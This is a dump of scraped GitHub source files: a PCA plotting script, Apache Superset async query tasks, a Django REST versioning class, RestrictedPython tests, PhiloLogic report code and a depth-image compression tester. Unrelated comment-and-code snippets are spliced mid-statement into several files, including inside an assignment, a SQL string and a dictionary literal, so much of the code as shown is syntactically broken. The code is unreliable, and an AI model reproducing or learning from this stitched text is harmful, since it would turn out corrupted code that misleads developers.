X_mean\n return X_centered\n\n\ndef PCA(X):\n P = len(X[0,:])\n Cov = 1/P * np.dot(X,X.T)\n D,V = np.linalg.eigh(Cov)\n return D,V\n\n\n#%%\n\nP = 70000\nX = pontos_3d(P)\nX = 
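# The four timed blocks above repeat one pattern, and the last prints "0.01" while
# actually passing 0.05; a loop keeps the threshold and the label in sync
# (signature as used above: fpgrowthFromFile(path, threshold, min_confidence)):
import time
from fpgrowth_py.fpgrowth import fpgrowthFromFile

for threshold in (0.5, 0.1, 0.05, 0.01):
    t0 = time.time()
    freqset, rules = fpgrowthFromFile("resources/fpgrowth_final.csv", threshold, 0)
    print(f"Time -- {threshold} -- {time.time() - t0:.3f}s | "
          f"{len(freqset)} itemsets, {len(rules)} rules")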
centraliza(X)\n[D,V] = PCA(X.T)\n\nfig = plt.figure(figsize = (12, 10))\nplt.xlim(-1,1)\nplt.ylim(-1,1)\n\nax = plt.axes(projection='3d')\n\n# Reproduz os pontos de P\nax.scatter(X[:,0], X[:,1], X[:,2], s=1)\n\n# Cores do gráfico\ncolors = ['red', 'green', 'orange']\n\nfor i in range(len(D)):\n x = [0, 2*np.sqrt(D[i])*V[i][0]]\n y = [0, 2*np.sqrt(D[i])*V[i][1]]\n z = [0, 2*np.sqrt(D[i])*V[i][2]]\n ax.plot(x, y, z, colors[i], linewidth=8)\n\nplt.show()","repo_name":"jpkcunha/MAT1330","sub_path":"Listas/Lista3/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25167829895","text":"from __future__ import annotations\n\nimport copy\nimport logging\nfrom typing import Any, cast, TYPE_CHECKING\n\nfrom celery.exceptions import SoftTimeLimitExceeded\nfrom flask import current_app, g\nfrom marshmallow import ValidationError\n\nfrom superset.charts.schemas import ChartDataQueryContextSchema\nfrom superset.exceptions import SupersetVizException\nfrom superset.extensions import (\n async_query_manager,\n cache_manager,\n celery_app,\n security_manager,\n)\nfrom superset.utils.cache import generate_cache_key, set_and_log_cache\nfrom superset.utils.core import override_user\nfrom superset.views.utils import get_datasource_info, get_viz\n\nif TYPE_CHECKING:\n from superset.common.query_context import QueryContext\n\nlogger = logging.getLogger(__name__)\nquery_timeout = current_app.config[\n \"SQLLAB_ASYNC_TIME_LIMIT_SEC\"\n] # TODO: new config key\n\n\ndef set_form_data(form_data: dict[str, Any]) -> None:\n g.form_data = form_data\n\n\ndef _create_query_context_from_form(form_data: dict[str, Any]) -> QueryContext:\n try:\n return ChartDataQueryContextSchema().load(form_data)\n except KeyError as ex:\n raise ValidationError(\"Request is incorrect\") from ex\n except ValidationError as error:\n raise error\n\n\n@celery_app.task(name=\"load_chart_data_into_cache\", soft_time_limit=query_timeout)\ndef load_chart_data_into_cache(\n job_metadata: dict[str, Any],\n form_data: dict[str, Any],\n) -> None:\n # pylint: disable=import-outside-toplevel\n from superset.commands.chart.data.get_data_command import ChartDataCommand\n\n user = (\n security_manager.get_user_by_id(job_metadata.get(\"user_id\"))\n or security_manager.get_anonymous_user()\n )\n\n with override_user(user, force=False):\n try:\n set_form_data(form_data)\n query_context = _create_query_context_from_form(form_data)\n command = ChartDataCommand(query_context)\n result = command.run(cache=True)\n cache_key = result[\"cache_key\"]\n result_url = f\"/api/v1/chart/data/{cache_key}\"\n async_query_manager.update_job(\n job_metadata,\n async_query_manager.STATUS_DONE,\n result_url=result_url,\n )\n except SoftTimeLimitExceeded as ex:\n logger.warning(\"A timeout occurred while loading chart data, error: %s\", ex)\n raise ex\n except Exception as ex:\n # TODO: QueryContext should support SIP-40 style errors\n error = str(ex.message if hasattr(ex, \"message\") else ex)\n errors = [{\"message\": error}]\n async_query_manager.update_job(\n job_metadata, async_query_manager.STATUS_ERROR, errors=errors\n )\n raise ex\n\n\n@celery_app.task(name=\"load_explore_json_into_cache\", soft_time_limit=query_timeout)\ndef load_explore_json_into_cache( # pylint: disable=too-many-locals\n job_metadata: dict[str, Any],\n form_data: dict[str, Any],\n response_type: str | None = None,\n force: bool = False,\n) -> None:\n cache_key_prefix = 
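# np.linalg.eigh returns eigenvectors as the *columns* of V (V[:, i] pairs with
# D[i]); the plotting loop above indexes rows, V[i][...], which draws the wrong
# principal axes unless V happens to be symmetric. Sketch of the column form:
import numpy as np

Cov = np.array([[2.0, 0.3, 0.0], [0.3, 1.0, 0.0], [0.0, 0.0, 0.5]])
D, V = np.linalg.eigh(Cov)
axes = [2 * np.sqrt(D[i]) * V[:, i] for i in range(len(D))]  # axis endpoints
# (Mean-centering can likewise be vectorized: X - X.mean(axis=0), which also
# avoids centraliza()'s accumulator being seeded with X.shape[1] instead of 0.)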
\"ejr-\" # ejr: explore_json request\n\n user = (\n security_manager.get_user_by_id(job_metadata.get(\"user_id\"))\n or security_manager.get_anonymous_user()\n )\n\n with override_user(user, force=False):\n try:\n set_form_data(form_data)\n datasource_id, datasource_type = get_datasource_info(None, None, form_data)\n\n # Perform a deep copy here so that below we can cache the original\n # value of the form_data object. This is necessary since the viz\n # objects modify the form_data object. If the modified version were\n # to be cached here, it will lead to a cache miss when clients\n # attempt to retrieve the value of the completed async query.\n original_form_data = copy.deepcopy(form_data)\n\n viz_obj = get_viz(\n datasource_type=cast(str, datasource_type),\n datasource_id=datasource_id,\n form_data=form_data,\n force=force,\n )\n # run query & cache results\n payload = viz_obj.get_payload()\n if viz_obj.has_error(payload):\n raise SupersetVizException(errors=payload[\"errors\"])\n\n # Cache the original form_data value for async retrieval\n cache_value = {\n \"form_data\": original_form_data,\n \"response_type\": response_type,\n }\n cache_key = generate_cache_key(cache_value, cache_key_prefix)\n set_and_log_cache(cache_manager.cache, cache_key, cache_value)\n result_url = f\"/superset/explore_json/data/{cache_key}\"\n async_query_manager.update_job(\n job_metadata,\n async_query_manager.STATUS_DONE,\n result_url=result_url,\n )\n except SoftTimeLimitExceeded as ex:\n logger.warning(\n \"A timeout occurred while loading explore json, error: %s\", ex\n )\n raise ex\n except Exception as ex:\n if isinstance(ex, SupersetVizException):\n errors = ex.errors\n else:\n error = ex.message if hasattr(ex, \"message\") else str(ex)\n errors = [error]\n\n async_query_manager.update_job(\n job_metadata, async_query_manager.STATUS_ERROR, errors=errors\n )\n raise ex\n","repo_name":"apache/superset","sub_path":"superset/tasks/async_queries.py","file_name":"async_queries.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"1024899658","text":"from functools import total_ordering\n\nfrom django.utils.functional import cached_property\nfrom rest_framework.fields import set_value\nfrom rest_framework.serializers import Field, Serializer\n\nfrom .utils import get_version_index\n\n\n@total_ordering\nclass Transformation:\n \"\"\"An implied migration between versions.\n\n Transformations are sorted (and therefore applied) in the following order:\n * Same version\n * Fields first\n * Serializers second\n * Newer version\n * ...\n\n Attributes:\n bases: Fully qualified class names of serializers, fields or serializer's fielsd.\n version: The version transformed to.\n\n .. 
note::\n ``bases`` can apply to either:\n * Serializers: ``myapp.serializers.MySerializer``.\n * Fields: ``myapp.fields.MyField``.\n * Serializer specific fields: ``myapp.serializers.MySerializer.field``\n \"\"\"\n\n bases = []\n version = None\n\n def __init__(self, base, field=None):\n self.base = base\n self.field = field\n\n def __str__(self):\n return '{base}{field} {version}'.format(\n base=self.base.__class__.__name__,\n field='.{}'.format(self.field) if self.field else '',\n version=self.version\n )\n\n def __repr__(self):\n return '<{cls}: {str}>'.format(\n cls=self.__class__.__name__,\n str=self.__str__()\n )\n\n def __eq__(self, other):\n return self.is_same_version(other.version_index) \\\n and self.field == other.field \\\n and self.base.__class__ == other.base.__class__\n\n def __lt__(self, other):\n if not self.is_same_version(other.version_index):\n return self.is_older_version(other.version_index)\n elif self.for_field:\n return False\n return self.for_specific_field and other.for_serializer\n\n @property\n def for_field(self):\n \"\"\"Whether this transformation applies to a ``Field``.\n\n .. note::\n A ``Serializer`` inherits from ``Field``. What is meant with field\n here is a class that inherits from ``Field`` but does not inherit\n from ``Serializer``.\n\n Returns:\n True if the base is a ``Field`` subclass and no ``Serializer`` subclass.\n bool\n \"\"\"\n return issubclass(self.base.__class__, Field) and not issubclass(self.base.__class__, Serializer)\n\n @property\n def for_specific_field(self):\n \"\"\"Whether this transformation applies to a serializer's field.\n\n Returns:\n True if the base is a ``Serializer`` subclass and a specific field is set.\n bool\n \"\"\"\n return self.field is not None and issubclass(self.base.__class__, Serializer)\n\n @property\n def for_serializer(self):\n \"\"\"Whether this transforation applies to a field.\n\n Returns:\n True if the base is a ``Serializer`` and no specific field is set.\n bool\n \"\"\"\n return self.field is None and issubclass(self.base.__class__, Serializer)\n\n @cached_property\n def version_index(self):\n return get_version_index(self.version)\n\n def is_newer_version(self, version_index):\n return self.version_index > version_index\n\n def is_older_version(self, version_index):\n return self.version_index < version_index\n\n def is_same_version(self, version_index):\n return self.version_index == version_index\n\n def transform(self, data, request, obj, forwards):\n method_prefix = 'forwards_' if forwards else 'backwards_'\n kwargs = {\n 'data': data,\n 'request': request\n }\n if not forwards:\n kwargs['obj'] = obj\n if self.for_field:\n return getattr(self, method_prefix + 'field')(\n **kwargs\n )\n elif self.for_serializer:\n return getattr(self, method_prefix + 'serializer')(\n **kwargs\n )\n else:\n if forwards:\n value = self.field.get_value(data)\n else:\n value = self.field.get_attribute(obj)\n kwargs['data'] = data[self.field]\n transformed_value = getattr(self, method_prefix + 'specific_field')(\n obj=obj,\n data=value,\n request=request\n )\n if forwards:\n set_value(data, self.field.source_attrs, value)\n else:\n data[self.field.field_name] = transformed_value\n return data\n\n def backwards_serializer(self, data, obj, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the backwards methods.'\n )\n\n def backwards_field(self, data, obj, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the backwards methods.'\n )\n\n def 
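# The class above defines only __eq__ and __lt__ and lets functools.total_ordering
# derive <=, >, and >=; a minimal self-contained sketch of that contract:
from functools import total_ordering

@total_ordering
class VersionTag:
    def __init__(self, index):
        self.index = index
    def __eq__(self, other):
        return self.index == other.index
    def __lt__(self, other):
        return self.index < other.index

assert VersionTag(1) <= VersionTag(2) and VersionTag(3) >= VersionTag(3)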
backwards_specific_field(self, data, obj, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the backwards methods.'\n )\n\n def forwards_serializer(self, data, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the forwards methods.'\n )\n\n def forwards_field(self, data, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the forwards methods.'\n )\n\n def forwards_specific_field(self, data, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the forwards methods.'\n )\n","repo_name":"ssprasad100/Lunchbreak_backend_again","sub_path":"lunchbreak/versioning_prime/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4634137288","text":"from tests.helper import restricted_exec\n\n\nSIMPLE_SUBSCRIPTS = \"\"\"\ndef simple_subscript(a):\n return a['b']\n\"\"\"\n\n\ndef test_read_simple_subscript(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SIMPLE_SUBSCRIPTS, glb)\n\n assert (value, 'b') == glb['simple_subscript'](value)\n\n\nVAR_SUBSCRIPT = \"\"\"\ndef simple_subscript(a, b):\n return a[b]\n\"\"\"\n\n\ndef test_read_subscript_with_variable(mocker):\n value = [1]\n idx = 0\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(VAR_SUBSCRIPT, glb)\n\n assert (value, 0) == glb['simple_subscript'](value, idx)\n\n\nTUPLE_SUBSCRIPTS = \"\"\"\ndef tuple_subscript(a):\n return a[1, 2]\n\"\"\"\n\n\ndef test_tuple_subscript(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(TUPLE_SUBSCRIPTS, glb)\n\n assert (value, (1, 2)) == glb['tuple_subscript'](value)\n\n\nSLICE_SUBSCRIPT_NO_UPPER_BOUND = \"\"\"\ndef slice_subscript_no_upper_bound(a):\n return a[1:]\n\"\"\"\n\n\ndef test_read_slice_subscript_no_upper_bound(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_NO_UPPER_BOUND, glb)\n\n assert (value, slice(1, None, None)) == glb['slice_subscript_no_upper_bound'](value) # NOQA: E501\n\n\nSLICE_SUBSCRIPT_NO_LOWER_BOUND = \"\"\"\ndef slice_subscript_no_lower_bound(a):\n return a[:1]\n\"\"\"\n\n\ndef test_read_slice_subscript_no_lower_bound(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_NO_LOWER_BOUND, glb)\n\n assert (value, slice(None, 1, None)) == glb['slice_subscript_no_lower_bound'](value) # NOQA: E501\n\n\nSLICE_SUBSCRIPT_NO_STEP = \"\"\"\ndef slice_subscript_no_step(a):\n return a[1:2]\n\"\"\"\n\n\ndef test_read_slice_subscript_no_step(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_NO_STEP, glb)\n\n assert (value, slice(1, 2, None)) == glb['slice_subscript_no_step'](value)\n\n\nSLICE_SUBSCRIPT_WITH_STEP = \"\"\"\ndef slice_subscript_with_step(a):\n return a[1:2:3]\n\"\"\"\n\n\ndef test_read_slice_subscript_with_step(mocker):\n value = None\n _getitem_ 
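# The mocker stubs in these tests just record their arguments; the same behaviour
# without mocks, showing the a[b] -> _getitem_(a, b) rewrite that RestrictedPython
# applies (restricted_exec is the helper imported at the top of this file):
def recording_getitem(ob, index):
    return (ob, index)

glb = {'_getitem_': recording_getitem}
restricted_exec("def f(a):\n    return a[1:2]", glb)
assert glb['f']('xs') == ('xs', slice(1, 2, None))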
= mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_WITH_STEP, glb)\n\n assert (value, slice(1, 2, 3)) == glb['slice_subscript_with_step'](value)\n\n\nEXTENDED_SLICE_SUBSCRIPT = \"\"\"\n\ndef extended_slice_subscript(a):\n return a[0, :1, 1:, 1:2, 1:2:3]\n\"\"\"\n\n\ndef test_read_extended_slice_subscript(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(EXTENDED_SLICE_SUBSCRIPT, glb)\n ret = glb['extended_slice_subscript'](value)\n ref = (\n value,\n (\n 0,\n slice(None, 1, None),\n slice(1, None, None),\n slice(1, 2, None),\n slice(1, 2, 3)\n )\n )\n\n assert ref == ret\n\n\nWRITE_SUBSCRIPTS = \"\"\"\ndef assign_subscript(a):\n a['b'] = 1\n\"\"\"\n\n\ndef test_write_subscripts(\n mocker):\n value = {'b': None}\n _write_ = mocker.stub()\n _write_.side_effect = lambda ob: ob\n glb = {'_write_': _write_}\n restricted_exec(WRITE_SUBSCRIPTS, glb)\n\n glb['assign_subscript'](value)\n assert value['b'] == 1\n\n\nDEL_SUBSCRIPT = \"\"\"\ndef del_subscript(a):\n del a['b']\n\"\"\"\n\n\ndef test_del_subscripts(\n mocker):\n value = {'b': None}\n _write_ = mocker.stub()\n _write_.side_effect = lambda ob: ob\n glb = {'_write_': _write_}\n restricted_exec(DEL_SUBSCRIPT, glb)\n glb['del_subscript'](value)\n\n assert value == {}\n","repo_name":"zopefoundation/RestrictedPython","sub_path":"tests/transformer/test_subscript.py","file_name":"test_subscript.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":363,"dataset":"github-code","pt":"61"} +{"seq_id":"74064388035","text":"#!/usr/bin/env python3\n\"\"\"Landing page reports.\"\"\"\n\nimport sqlite3\nimport sys\n\nimport orjson\nfrom philologic.runtime.DB import DB\nfrom unidecode import unidecode\n\n\ndef landing_page_bibliography(request, config):\n \"\"\"Retrieves volumes for dictionary view\"\"\"\n db = DB(config.db_path + \"/data/\")\n object_level = request.object_level\n if object_level and object_level in [\"doc\", \"div1\", \"div2\", \"div3\"]:\n hits = db.get_all(object_level)\n else:\n hits = db.get_all(db.locals[\"default_object_level\"])\n results = []\n c = db.dbh.cursor()\n for hit in hits:\n hit_object = {}\n for field in db.locals[\"metadata_fields\"]:\n hit_object[field] = hit[field] or \"\"\n if object_level == \"doc\":\n hit_object[\"philo_id\"] = hit.philo_id[0]\n else:\n hit_object[\"philo_id\"] = \"/\".join([str(i) for i in hit.philo_id])\n doc_id = f\"{hit.philo_id[0]} 0 0 0 0 0 0\"\n next_doc_id = f\"{hit.philo_id[0] + 1} 0 0 0 0 0 0\"\n c.execute(f'select rowid from toms where philo_id=\"{doc_id}\"')\n doc_row = c.fetchone()[\"rowid\"]\n c.execute(f'select rowid from toms where philo_id=\"{next_doc_id}\"')\n try:\n next_doc_row = c.fetchone()[\"rowid\"]\n except TypeError: # if this is the last doc, just get the last rowid in the table.\n c.execute(\"select max(rowid) from toms;\")\n next_doc_row = c.fetchone()[0]\n try:\n c.execute(\n f'select * from toms where rowid between {doc_row} and {next_doc_row} and head is not null and head !=\"\" limit 1'\n )\n except sqlite3.OperationalError: # no type field in DB\n c.execute(\n 'select * from toms where rowid between ? and ? 
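# The queries here mix f-string interpolation and "?" placeholders; a
# self-contained sketch of the placeholder form, which leaves quoting to sqlite
# (table and values hypothetical):
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE toms (philo_id TEXT, head TEXT)")
db.execute("INSERT INTO toms VALUES (?, ?)", ("1 0 0 0 0 0 0", "Chapter I"))
row = db.execute("SELECT head FROM toms WHERE philo_id = ?",
                 ("1 0 0 0 0 0 0",)).fetchone()
assert row == ("Chapter I",)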
and head is not null and head !=\"\" limit 1',\n (doc_row, next_doc_row),\n )\n try:\n start_head = c.fetchone()[\"head\"]\n start_head = start_head.lower().title()\n except Exception as e:\n print(repr(e), file=sys.stderr)\n start_head = \"\"\n try:\n c.execute(\n f'select head from toms where rowid between {doc_row} and {next_doc_row} and head is not null and head !=\"\" order by rowid desc limit 1'\n )\n except sqlite3.OperationalError: # no type field in DB\n c.execute(\n f'select head from toms where rowid between {doc_row} and {next_doc_row} and head is not null and head !=\"\" order by rowid desc limit 1'\n )\n try:\n end_head = c.fetchone()[\"head\"]\n end_head = end_head.lower().title()\n except:\n end_head = \"\"\n hit_object[\"start_head\"] = start_head\n hit_object[\"end_head\"] = end_head\n\n results.append(hit_object)\n return orjson.dumps(results)\n\n\ndef group_by_range(request_range, request, config):\n \"\"\"Group metadata by range\"\"\"\n db = DB(config.db_path + \"/data/\")\n metadata_queried = request.group_by_field\n is_date = False\n try:\n int(request_range[0])\n int(request_range[1])\n is_date = True\n except ValueError:\n pass\n\n metadata_fields_needed, citations = get_fields_and_citations(request, config)\n cursor = db.dbh.cursor()\n content = {}\n if is_date:\n content_type = \"date\"\n query = f'select * from toms where philo_type=\"doc\" and {metadata_queried} between ? and ?'\n cursor.execute(query, (int(request_range[0]), int(request_range[1])))\n content = {}\n for doc in cursor:\n metadata = {m: doc[m] for m in metadata_fields_needed}\n if str(metadata[metadata_queried]) not in content:\n content[f\"{metadata[metadata_queried]}\"] = {\"prefix\": metadata[metadata_queried], \"results\": []}\n content[f\"{metadata[metadata_queried]}\"][\"results\"].append(\n {\n \"metadata\": metadata,\n \"count\": 1,\n }\n )\n return orjson.dumps(\n {\n \"display_count\": request.display_count,\n \"content_type\": content_type,\n \"content\": content,\n \"citations\": citations,\n }\n )\n content_type = metadata_queried\n query_range = set(range(ord(request_range[0]), ord(request_range[1]) + 1)) # Ordinal avoids unicode issues...\n try:\n cursor.execute(f'select *, count(*) as count from toms where philo_type=\"doc\" group by {metadata_queried}')\n except sqlite3.OperationalError:\n return orjson.dumps({\"display_count\": request.display_count, \"content_type\": content_type, \"content\": []})\n for doc in cursor:\n normalized_test_value = \"\"\n if doc[metadata_queried] is None:\n continue\n try:\n initial_letter = doc[metadata_queried][0].lower()\n except IndexError:\n # we have an empty string\n continue\n try:\n test_value = ord(initial_letter)\n normalized_test_value = ord(unidecode(initial_letter))\n except TypeError:\n continue\n initial = initial_letter.upper()\n # Are we within the range?\n if test_value in query_range or normalized_test_value in query_range:\n if normalized_test_value in query_range:\n initial = unidecode(initial_letter).upper()\n metadata = {m: doc[m] for m in metadata_fields_needed}\n if initial not in content:\n content[initial] = {\"prefix\": initial, \"results\": []}\n content[initial][\"results\"].append(\n {\n \"metadata\": metadata,\n \"count\": doc[\"count\"],\n }\n )\n return orjson.dumps(\n {\n \"display_count\": request.display_count,\n \"content_type\": content_type,\n \"content\": content,\n \"citations\": citations,\n }\n )\n\n\ndef group_by_metadata(request, config):\n \"\"\"Count result by metadata field\"\"\"\n db = 
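# Sketch of the accent-folding bucket test above: check both the raw initial and
# its unidecode() transliteration against the requested ordinal range, so "Émile"
# lands in the A-E bucket (single-character transliterations assumed, as the
# surrounding TypeError handler acknowledges):
from unidecode import unidecode

def in_letter_range(value, lo="a", hi="e"):
    initial = value[0].lower()
    rng = range(ord(lo), ord(hi) + 1)
    return ord(initial) in rng or ord(unidecode(initial)) in rng

assert in_letter_range("Émile") and not in_letter_range("Zola")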
DB(config.db_path + \"/data/\")\n metadata_fields_needed, citations = get_fields_and_citations(request, config)\n cursor = db.dbh.cursor()\n query = f\"\"\"select * from toms where philo_type=\"doc\" and {request.group_by_field}=?\"\"\"\n cursor.execute(query, (request.query,))\n result_group = []\n for doc in cursor:\n metadata = {}\n for m in metadata_fields_needed:\n try:\n metadata[m] = doc[m]\n except IndexError:\n pass\n result_group.append(\n {\n \"metadata\": metadata,\n }\n )\n return orjson.dumps(\n {\n \"display_count\": request.display_count,\n \"content_type\": request.group_by_field,\n \"content\": [{\"prefix\": request.query, \"results\": result_group}],\n \"citations\": citations,\n }\n )\n\n\ndef get_fields_and_citations(request, config):\n \"\"\"Get fields and citations\"\"\"\n metadata_fields_needed = [request.group_by_field, \"philo_id\"]\n citations = []\n for conf in config.default_landing_page_browsing:\n if conf[\"group_by_field\"] == request.group_by_field:\n for citation in conf[\"citation\"]:\n citations.append(citation)\n metadata_fields_needed.append(citation[\"field\"])\n break\n return metadata_fields_needed, citations\n","repo_name":"ARTFL-Project/PhiloLogic4","sub_path":"python/philologic/runtime/reports/landing_page.py","file_name":"landing_page.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"24562111826","text":"from blabel import LabelWriter\nimport datetime\n\ndef createLabel(content):\n vorname = content[0]\n nachname = content[1]\n date = content[2].strftime(\"%d.%m.%Y\")\n geburtsdatum = datetime.datetime.strptime(content[3], '%Y-%m-%d').strftime(\"%d.%m.%Y\")\n adresse = content[4]\n ort = content[5]\n token = content[6]\n telefon = content[7]\n label_writer = LabelWriter(\"../utils/Labels/template.html\", default_stylesheets=(\"../utils/Labels/style.css\",))\n filename = \"../../Labels/\" + str(token) + \".pdf\"\n records = [\n dict(Vorname=vorname, Nachname=nachname, Adresse=adresse, Wohnort=ort, Geburtsdatum=geburtsdatum, Date=date, Telefon=telefon),\n ]\n label_writer.write_labels(records, target=filename)\n return filename","repo_name":"DRK-Odenwaldkreis/Testerfassung","sub_path":"LabelCreationJob/createLabel.py","file_name":"createLabel.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74596920515","text":"import os\nimport time\n\nimport cv2\nimport torch\nfrom dataset.testDataset import ImageFolderUnited\nfrom dataset.utils import *\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom utils.IOutils import *\nfrom utils.metrics import AverageMeter, compute_metrics\n\nfrom .tester_single import TesterSingle\n\n\nclass TesterUnited(TesterSingle):\n def __init__(self, args, model_config) -> None:\n super().__init__(args, model_config)\n\n def init_dataset(self, test_dataset, test_batch_size, num_workers, channel):\n test_transforms = transforms.Compose([transforms.ToTensor()])\n test_dataset = ImageFolderUnited(test_dataset, transform=test_transforms, debug=self.debug)\n test_dataloader = DataLoader(test_dataset, batch_size=test_batch_size, num_workers=num_workers, shuffle=False)\n return test_dataloader\n\n def getAvgMeter(self):\n return {\n \"avg_rgb_psnr\": AverageMeter(),\n \"avg_rgb_ms_ssim\": AverageMeter(),\n \"avg_rgb_bpp\": AverageMeter(),\n \"avg_depth_psnr\": AverageMeter(),\n 
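# AverageMeter comes from utils.metrics (not shown in this file); the testers rely
# only on .update(value) and .avg, so a minimal stand-in consistent with that
# usage (the real class may differ internally):
class AverageMeterSketch:
    def __init__(self):
        self.sum = 0.0
        self.count = 0

    def update(self, value, n=1):
        self.sum += value * n
        self.count += n

    @property
    def avg(self):
        return self.sum / self.count if self.count else 0.0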
\"avg_depth_ms_ssim\": AverageMeter(),\n \"avg_depth_bpp\": AverageMeter(),\n \"avg_deocde_time\": AverageMeter(),\n \"avg_encode_time\": AverageMeter(),\n }\n\n def updateAvgMeter(self, avgMeter, rgb_p, rgb_m, rgb_bpp, depth_p, depth_m, depth_bpp, dec_time, enc_time):\n avgMeter[\"avg_rgb_psnr\"].update(rgb_p)\n avgMeter[\"avg_rgb_ms_ssim\"].update(rgb_m)\n avgMeter[\"avg_rgb_bpp\"].update(rgb_bpp)\n avgMeter[\"avg_depth_psnr\"].update(depth_p)\n avgMeter[\"avg_depth_ms_ssim\"].update(depth_m)\n avgMeter[\"avg_depth_bpp\"].update(depth_bpp)\n avgMeter[\"avg_deocde_time\"].update(dec_time)\n avgMeter[\"avg_encode_time\"].update(enc_time)\n\n @torch.no_grad()\n def test_model(self, padding_mode=\"reflect0\", padding=True):\n self.net.eval()\n avgMeter = self.getAvgMeter()\n rec_dir = self.get_rec_dir(padding=padding, padding_mode=padding_mode)\n\n for i, (rgb, depth, rgb_img_name, depth_img_name) in enumerate(self.test_dataloader):\n B, C, H, W = rgb.shape\n\n rgb = rgb.to(self.device)\n depth = depth.to(self.device)\n\n rgb_pad = pad(rgb, padding_mode)\n depth_pad = pad(depth, padding_mode)\n rgb_stream_path = os.path.join(rec_dir, \"depth_bin\")\n depth_stream_path = os.path.join(rec_dir, \"rgb_bin\")\n rgb_bpp, depth_bpp, enc_time = self.compress_one_image_united(\n x=(rgb_pad, depth_pad),\n stream_path=(rgb_stream_path, depth_stream_path),\n H=H,\n W=W,\n img_name=rgb_img_name[0],\n )\n rgb_x_hat, depth_x_hat, dec_time = self.decompress_one_image_united(\n stream_path=(rgb_stream_path, depth_stream_path), img_name=rgb_img_name[0], mode=padding_mode\n )\n self.test_save_and_log_perimg(\n i,\n rgb_x_hat,\n depth_x_hat,\n rgb,\n depth,\n rec_dir,\n rgb_img_name,\n avgMeter,\n rgb_bpp,\n depth_bpp,\n dec_time,\n enc_time,\n )\n self.test_finish_log(avgMeter, rec_dir)\n\n def test_save_and_log_perimg(\n self, i, rgb_x_hat, depth_x_hat, rgb, depth, rec_dir, img_name, avgMeter, rgb_bpp, depth_bpp, dec_time, enc_time\n ):\n rgb_p, rgb_m = compute_metrics(rgb_x_hat, rgb)\n depth_p, depth_m = compute_metrics(depth_x_hat, depth)\n\n saveImg(rgb_x_hat, os.path.join(rec_dir, \"rgb_rec\", f\"{img_name[0]}_rec.png\"))\n saveImg(depth_x_hat, os.path.join(rec_dir, \"depth_rec\", f\"{img_name[0]}_rec_8bit.png\"))\n\n if rec_dir.find(\"sun\") != -1:\n depth = depth_x_hat * 100000\n else:\n depth = depth_x_hat * 10000\n depth = depth.cpu().squeeze().numpy().astype(\"uint16\")\n cv2.imwrite(os.path.join(self.save_dir, \"depth_rec\", f\"{img_name[0]}_rec_16bit.png\"), depth)\n\n self.updateAvgMeter(avgMeter, rgb_p, rgb_m, rgb_bpp, depth_p, depth_m, depth_bpp, dec_time, enc_time)\n self.logger_test.info(\n f\"Image[{i}] | \"\n f\"rBpp loss: {rgb_bpp:.4f} | \"\n f\"dBpp loss: {depth_bpp:.4f} | \"\n f\"rPSNR: {rgb_p:.4f} | \"\n f\"dPSNR: {depth_p:.4f} | \"\n f\"rMS-SSIM: {rgb_m:.4f} | \"\n f\"sMS-SSIM: {depth_m:.4f} | \"\n f\"Encoding Latency: {enc_time:.4f} | \"\n f\"Decoding latency: {dec_time:.4f}\"\n )\n\n def test_finish_log(self, avgMeter, rec_dir):\n self.logger_test.info(\n f\"Epoch:[{self.epoch}] | \"\n f\"Avg Bpp: {avgMeter['avg_rgb_bpp'].avg:.7f} | \"\n f\"Avg Bpp: {avgMeter['avg_depth_bpp'].avg:.7f} | \"\n f\"Avg PSNR: {avgMeter['avg_rgb_psnr'].avg:.7f} | \"\n f\"Avg PSNR: {avgMeter['avg_depth_psnr'].avg:.7f} | \"\n f\"Avg MS-SSIM: {avgMeter['avg_rgb_ms_ssim'].avg:.7f} | \"\n f\"Avg MS-SSIM: {avgMeter['avg_depth_ms_ssim'].avg:.7f} | \"\n f\"Avg Encoding Latency: {avgMeter['avg_encode_time'].avg:.6f} | \"\n f\"Avg Decoding latency: {avgMeter['avg_deocde_time'].avg:.6f}\"\n )\n\n 
